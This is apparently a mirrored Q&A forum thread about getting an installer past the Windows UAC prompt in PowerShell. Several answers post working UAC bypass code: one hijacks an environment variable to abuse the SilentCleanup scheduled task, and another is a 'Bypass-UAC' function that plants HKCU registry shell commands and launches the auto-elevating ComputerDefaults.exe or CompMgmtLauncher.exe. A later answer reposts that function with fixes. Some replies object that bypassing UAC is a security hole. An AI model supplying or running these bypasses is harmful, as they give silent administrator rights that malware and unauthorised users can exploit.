I'm attempting to install an EXE using Powershell with the following code Start-Process -FilePath "C:\Windows\Temp\Installer.exe" -Verb runas I'm getting the User Account Control pop up that says "Do you want to allow the following program to make changes to this computer?" I would rather not disable UAC. Are there any methods to programatically say "Yes" to the UAC prompt or to get around it?
UAC Getting in the Way of EXE Install Powershell
Asked Answered
Disabling UAC edits a key in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, and thus requires write access to HKLM. In other words, disabling UAC requires admin rights, which defeats the point of your question.
Windows has a built-in AutoElevate backdoor. You can use this to launch other executables.
- An obvious approach is Task Scheduler. However, it's not the only approach.
- Likewise, any windows executable that can auto-elevate can be used to spawn a high integrity process without UAC.
- This can be done programmatically below:
AlwaysNotify: (8.1 & after)
$regPath = "HKCU:\Environment"
$installer = "C:\Windows\Temp\Installer.exe" # change it yourself
Set-ItemProperty -Path $regPath -Name "windir" -Value "$installer && REM " -Force
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Start-Sleep -s 5 # Depending on the machine, some extra time may be required
Remove-ItemProperty -Path $regPath -Name "windir" -Force
Default:
function Bypass-UAC{
[CmdletBinding()]
param([string]$key, [string]$exploit)
$regPath = "HKCU:\Software\Classes\$key\shell\open\command"
$installer = "C:\Windows\Temp\Installer.exe" # change it yourself
New-Item $regPath -Force
New-ItemProperty $regPath -Name "DelegateExecute" -Value $null -Force
Set-ItemProperty $regPath -Name "(default)" -Value $installer -Force
Start-Process $exploit
Start-Sleep -s 5 # Depending on the machine, some extra time may be required
Remove-Item $regPath -Force -Recurse
}
$ver = [System.Environment]::OSVersion.Version.Major #Get Windows Version
if ($ver -eq 10) {
Bypass-UAC ms-settings ComputerDefaults.exe
} else {
Bypass-UAC mscfile CompMgmtLauncher.exe
}
NeverNotify / Disabled:
Start-Process "C:\Windows\Temp\Installer.exe" -Verb runas
https://mcmap.net/q/22615/-windows-10-after-gaining-remote-access-remotely-start-quick-assist-as-administrator-without-uac-or-temporarily-disable-uac/38108 I'm struggling (PowerShell is quite new to me) … –
Sensuous
@GrahamPerrin just change the value of
$installer to the path of your quickassist.exe –
Highbinder You are using runas, thus forcing a prompt to supply credentials in order to continue.
Sooo, there's that, or are you saying, wherever the script is being ran, the use is already logged on as admin? If that is the case, why elevate at all?
Thus ending up doing as Backin points out:
# Check UACState
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).EnableLUA
Though disabling UAC is not a recommended by MS and many others, though we know folks will anyway, for whatever reasoning they can justify it with.
Resources:
elevate without prompt - verb runas start-process
https://superuser.com/questions/195689/how-to-start-process-without-uac
https://gallery.technet.microsoft.com/scriptcenter/How-to-easily-run-an-0c0eb47a
The direct answer to your question:
Are there any methods to programmatically say "Yes" to the UAC prompt or to get around it?
...is "no." The reason is that this would be a huge security hole. Imagine if this were possible: All malware would have to do is use this bypass technique.
UAC is specifically designed to prevent you from doing what you are asking. While it is possible to disable UAC, it is definitely not recommended.
Aaron Margosis (Microsoft) wrote a blog post about this a while back:
FAQ: Why can't I bypass the UAC prompt?
A quote from that blog:
If it were possible to mark an application to run with silently-elevated privileges, what would become of all those apps out there with LUA [limited user access] bugs? Answer: they'd all be marked to silently elevate. How would future software for Windows be written? Answer: To silently elevate. Nobody would actually fix their apps, and end-user applications will continue to require and run with full administrative permissions unnecessarily.
HUGE security hole indeed... –
Highbinder
Yes, UAC can be abused, but it's important to note that, technically speaking, UAC is not a security boundary. –
Hygroscopic
I used ps2exe to generate my .exe from a .ps1 script. Using HaxAddict1337's Default code resulted in my .exe running but immediately closing.
I got it to work after adding a Start-Sleep -s 10 right before the Start-Process:
#this is used to run an .exe as Administrator without the "Are you sure?" UAC prompt
function Bypass-UAC{
[CmdletBinding()]
param([string]$key, [string]$exploit)
$regPath = "HKCU:\Software\Classes\$key\shell\open\command"
$installer = "C:\Windows\Temp\myProgram.exe" # change it yourself
New-Item $regPath -Force
New-ItemProperty $regPath -Name "DelegateExecute" -Value $null -Force
Set-ItemProperty $regPath -Name "(default)" -Value $installer -Force
Start-Sleep -s 10 #if it's not working, try increasing these values
Start-Process $exploit
Start-Sleep -s 5 #if it's not working, try increasing these values
Remove-Item $regPath -Force -Recurse
}
$ver = [System.Environment]::OSVersion.Version.Major #Get Windows Version
if ($ver -eq 10) {
Bypass-UAC ms-settings ComputerDefaults.exe
} else {
Bypass-UAC mscfile CompMgmtLauncher.exe
}
just write this command to bypass UAC but I don't know how to give permission to say yes in bat script "powershell Start-Process cmd -Verb runAs"
As it’s currently written, your answer is unclear. Please edit to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers in the help center. –
Snatch
© 2022 - 2024 — McMap. All rights reserved.
LowRiskFileTypesto allow an exception to fully automate it. – Effortless